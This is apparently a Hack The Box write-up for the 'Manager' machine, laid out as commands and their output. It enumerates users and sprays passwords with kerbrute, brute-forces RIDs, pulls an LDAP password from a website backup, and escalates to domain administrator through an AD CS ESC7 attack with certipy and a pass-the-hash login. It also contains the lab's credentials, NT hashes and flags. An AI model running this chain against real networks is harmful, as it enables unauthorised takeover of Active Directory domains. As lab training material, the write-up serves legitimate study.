Manager
MediumMachineOct 21, 2023
#User#kerbrute#MSSQL#attack-2#Vulnerable#nmap#crackmapexec#smbclient#certipy#mssqlclient
User
**User: **raven@manager.htb
**Password: **R4v3nBe5tD3veloP3r!123
Got some usernames from kerbrute in User Enumeration
Have annonymous login for smb with Guest, and DC01
Kerbrute Enumeration
Mssql
Website Backup
└──╼ $ls -la
total 1072
drwxr-xr-x 1 hat hat 198 Oct 22 06:44 .
drwxr-xr-x 1 hat hat 142 Oct 22 06:44 ..
-rw-r--r-- 1 hat hat 5386 Jul 27 05:32 about.html
-rw-r--r-- 1 hat hat 5317 Jul 27 05:32 contact.html
drwxr-xr-x 1 hat hat 118 Oct 22 06:44 css
drwxr-xr-x 1 hat hat 510 Oct 22 06:44 images
-rw-r--r-- 1 hat hat 18203 Jul 27 05:32 index.html
drwxr-xr-x 1 hat hat 62 Oct 22 06:44 js
-rw-r--r-- 1 hat hat 698 Jul 27 05:35 .old-conf.xml
-rw-r--r-- 1 hat hat 7900 Jul 27 05:32 service.html
-rw-r--r-- 1 hat hat 1045328 Oct 22 06:43 website-backup-27-07-23-old.zip
└──╼ $cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
└──╼ $evil-winrm -u raven -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> ls
*Evil-WinRM* PS C:\Users\Raven\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Raven\Desktop> ls
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/19/2023 11:25 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> cat user.txt
afd29645e7cf9fefb57c1bfc57a89541
Root
Raven
Resources
- https://www.tarlogic.com/blog/ad-cs-esc7-attack/
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalationattack-2
We have dangerous permissions that will allow us to execute an ESC7 attack
- ManageCA allows a user to change the CA’s settings, which, among other things, can be used to turn on SAN (Subject Alternative Name) to all the templates managed by the CA. SAN is an extension that allows a user to request a certificate linked to additional identities. This is the key behind the attack ESC1, because if a template has this extension, it is possible to request a valid certificate for any domain account. As we said, turning this on at CA level, makes the extension available to all the CA’s templates even if they don’t have it individually (allowing for the attack ESC6).
ESC7 Attack
See hacktricks link in resource
First we need ManageCertificates permission in addition to our ManageCA
Before
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
Enable ManageCertificates
└──╼ $certipy ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -password $(cat passwords)
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
After
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
So we can now generate our request for the administrator.pfx
Validating req for pfx
└──╼ $certipy req -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -template SubCA -upn administrator@manager.htb
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for thi
s type of certificate.
[*] Request ID is 26
Would you like to save the private key? (y/N) y
[*] Saved private key to 26.key
[-] Failed to request certificate
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy ca -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -issue-request 26
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy req -u raven -p $(cat passwords) -target manager.htb -ca manager-DC01-CA -retrieve 26
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 26
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '26.key'
[*] Saved certificate and private key to 'administrator.pfx'
└──╼ $certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Now we have the administrator.pfx!
Getting Administrator Hash
└──╼ $certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $evil-winrm -u Administrator -H ae5064c2f62317332c88629e025924ef -i manager.htb
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/19/2023 11:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b387cd4b5a9759648f1f6752dba697f4
System Files
Here is a log of all (potentially)relevant files
Tools
nmap
kerbrute
User Enumeration
└──╼ $~/htb/tools/kerbrute -d manager --dc dc01.manager.htb userenum /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/21/23 - Ronnie Flathers @ropnop
2023/10/21 17:36:59 > Using KDC(s):
2023/10/21 17:36:59 > dc01.manager.htb:88
2023/10/21 17:37:00 > [+] VALID USERNAME: ryan@manager
2023/10/21 17:37:01 > [+] VALID USERNAME: guest@manager
2023/10/21 17:37:02 > [+] VALID USERNAME: cheng@manager
2023/10/21 17:37:03 > [+] VALID USERNAME: raven@manager
2023/10/21 17:37:07 > [+] VALID USERNAME: administrator@manager
2023/10/21 17:37:18 > [+] VALID USERNAME: Ryan@manager
2023/10/21 17:37:23 > [+] VALID USERNAME: Raven@manager
2023/10/21 17:37:28 > [+] VALID USERNAME: operator@manager
2023/10/21 17:38:13 > [+] VALID USERNAME: Guest@manager
2023/10/21 17:38:14 > [+] VALID USERNAME: Administrator@manager
2023/10/21 17:38:47 > [+] VALID USERNAME: Cheng@manager
2023/10/21 17:40:21 > [+] VALID USERNAME: jinwoo@manager
2023/10/21 17:40:37 > [+] VALID USERNAME: RYAN@manager
2023/10/21 17:41:45 > [+] VALID USERNAME: RAVEN@manager
2023/10/21 17:41:47 > [+] VALID USERNAME: GUEST@manager
Password Spraying
└──╼ $~/htb/tools/kerbrute passwordspray users --user-as-pass -d manager.htb --dc dc01.manager.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 10/22/23 - Ronnie Flathers @ropnop
2023/10/22 05:58:42 > Using KDC(s):
2023/10/22 05:58:42 > dc01.manager.htb:88
2023/10/22 05:58:42 > [+] VALID LOGIN: operator@manager.htb:operator
2023/10/22 05:58:42 > Done! Tested 31 logins (1 successes) in 0.397 seconds
crackmapexec
RID Bruteforcing
└──╼ $ crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
SMB manager.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB manager.htb 445 DC01 [+] manager.htb\anonymous:
SMB manager.htb 445 DC01 [+] Brute forcing RIDs
SMB manager.htb 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB manager.htb 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB manager.htb 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB manager.htb 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB manager.htb 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB manager.htb 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB manager.htb 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB manager.htb 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB manager.htb 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB manager.htb 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB manager.htb 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB manager.htb 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB manager.htb 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB manager.htb 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB manager.htb 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB manager.htb 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB manager.htb 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB manager.htb 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB manager.htb 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB manager.htb 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
smbclient
Share List
└──╼ $smbclient -U manager/annonymous -N -L //dc01.manager.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
certipy
Operator Certificate
┌─[hat@parrot]─[~/htb/Machines/obs3/Medium/manager]
└──╼ $certipy req -u operator@manager.htb -p operator -target dc01.manager.htb -ca manager-DC01-CA
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Operator@manager.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-1119'
[*] Saved certificate and private key to 'operator.pfx'
└──╼ $certipy auth -pfx operator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: operator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'operator.ccache'
[*] Trying to retrieve NT hash for 'operator'
[*] Got hash for 'operator@manager.htb': aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df
Template List - Raven
└──╼ $certipy ca -u raven -p $(cat passwords) -target dc01.manager.htb -list-templates -ca manager-DC01-CA
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Enabled certificate templates on 'manager-DC01-CA':
SubCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
Administrator
Vulnerable Templates
└──╼ $certipy find -u raven -p $(cat passwords) -target dc01.manager.htb -stdout -vulnerable
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
mssqlclient
└──╼ $mssqlclient.py manager.htb/operator:operator@dc01.manager.htb -windows-auth
SQL (MANAGER\Operator guest@msdb)> xp_dirtree C:\inetpub\wwwroot
[%] exec master.sys.xp_dirtree 'C:\inetpub\wwwroot',1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
Flags
User Flag
afd29645e7cf9fefb57c1bfc57a89541Click to reveal user flag
Root Flag
b387cd4b5a9759648f1f6752dba697f4Click to reveal root flag